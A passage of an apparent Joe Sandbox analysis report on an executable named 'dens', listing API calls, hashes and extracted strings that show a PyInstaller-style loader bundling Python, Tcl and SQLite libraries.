                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C02F66AF0C78285FB6D8B159230B7D6AD1AB52B56F0442B5CA7E873D9DE3DE481C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mem_$FreeSubtypeType_$DataErr_FromKindMallocMemoryReallocUnicode_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3719493655-0
                                                                                                                                                                                                                                              • Opcode ID: 0b61fa8abd9dfcdf7751d429d18c280f61a1d7a5a4373fae919a70ebd3257318
                                                                                                                                                                                                                                              • Instruction ID: 5f947efb0c69f75659c0e86a687737ab3d8f2b01e20fd76f2e1244905b275477
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b61fa8abd9dfcdf7751d429d18c280f61a1d7a5a4373fae919a70ebd3257318
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A022472B1CA828AE72E9B14D434E7937A0FF85780F5541B1D66E867CCEE2DE44AC314
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 313767242-0
                                                                                                                                                                                                                                              • Opcode ID: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                              • Instruction ID: 7bbd088c070252a8e9ca49839f4b09f3a9a634b13c3b26c1ddc56ed5053cdc37
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 077b0f214cb87451efc13930c849abf149ec882450af492fe5d50a1ac414abff
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D317A76719B828EEBA48F60E8607EA33A4FB84304F40403ADA5E47B98DF38D54DC714
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                                                                                              • API String ID: 2221118986-463513059
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                                                                                              • API String ID: 2221118986-741541785
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Mem_$MallocSubtypeType_$DeallocErr_FreeMemory
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4139299733-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                              • API String ID: 0-2031831958
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2227656907-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5840
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5852
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5889
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F589B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58B4
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58C6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58DF
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F58F1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F590D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F591F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F593B
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F594D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5969
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F597B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F5997
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59A9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59C5
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF62C0F64CF,?,00007FF62C0F336E), ref: 00007FF62C0F59D7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                              • API String ID: 199729137-653951865
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                              • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                              • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF62C0F45F4,00000000,00007FF62C0F1985), ref: 00007FF62C0F93C9
                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00007FF62C0F86B7,?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F822C
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2810: MessageBoxW.USER32 ref: 00007FF62C0F28EA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                              • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                              • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CompareUnicode_$DeallocStringWith
                                                                                                                                                                                                                                              • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                              • API String ID: 1004266020-3528878251
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Module_$DeallocObjectObject_$ConstantFromSpecStringTrackTypeType_
                                                                                                                                                                                                                                              • String ID: 15.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                                                                                                                                                                                                              • API String ID: 2663085338-4141011787
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                                                                                                                                                                                                              • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                                              • API String ID: 1723213316-3528878251
                                                                                                                                                                                                                                              • Opcode ID: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                                              • Instruction ID: ff11c8a9c53d2a19944ee3ca85aed121d89ff6724793bb84932215bb7bb49fc8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0183ee75f38b3d9b4e000f242270cd4c61522a137d2eba0fb5a9939ca12be486
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F51A025F0C6438AFB69AB25A470E3D3290AF51BC0F0451B1D96E87ACDDF2CE40B8708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: $%04X$a unicode character$argument$decomposition
                                                                                                                                                                                                                                              • API String ID: 1318908108-4056541097
                                                                                                                                                                                                                                              • Opcode ID: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                                              • Instruction ID: 879030ecdb9cee80fa19b6e581e022b3566b2d0577b2035cc147f2d83a91ba25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2aa5bcb769f9567ef44792d0b8645ff4acf96607a2464068c30a17cc2bf935c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D41B6A1B08A829AEB288B14E834BB973A1FF55754F440275D97E476C8DF2CD54EC304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFABBD940: memcpy.VCRUNTIME140 ref: 00007FFDFABBDAE7
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFABBD440: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD59A
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFABBD440: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDFABB7857), ref: 00007FFDFABBD617
                                                                                                                                                                                                                                              • memcpy.VCRUNTIME140 ref: 00007FFDFAC24B42
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
                                                                                                                                                                                                                                              • API String ID: 3510742995-2234786739
                                                                                                                                                                                                                                              • Opcode ID: 788232bee9104a0cd9c319c12bad25031100ac734658960405c14a196bff1add
                                                                                                                                                                                                                                              • Instruction ID: fa405fb04897252829675dde9403c305925683d7a51ca931cb7a09698a3bda6f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 788232bee9104a0cd9c319c12bad25031100ac734658960405c14a196bff1add
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BB18B7AB08B818AE728CF25D560AAE37F5EB49788F044276DE6C077C9DB79D054CB04
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                              • String ID: P%
                                                                                                                                                                                                                                              • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                              • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction ID: 46fc1f4ccb1474852cc9f4fe89bbc49f8b1fa66c052088270278482ea0f44b78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0351E876604BA186DA349F2AF8181BAB7A1F798B61F004125EFDF83694DF7CD085DB10
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                              • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
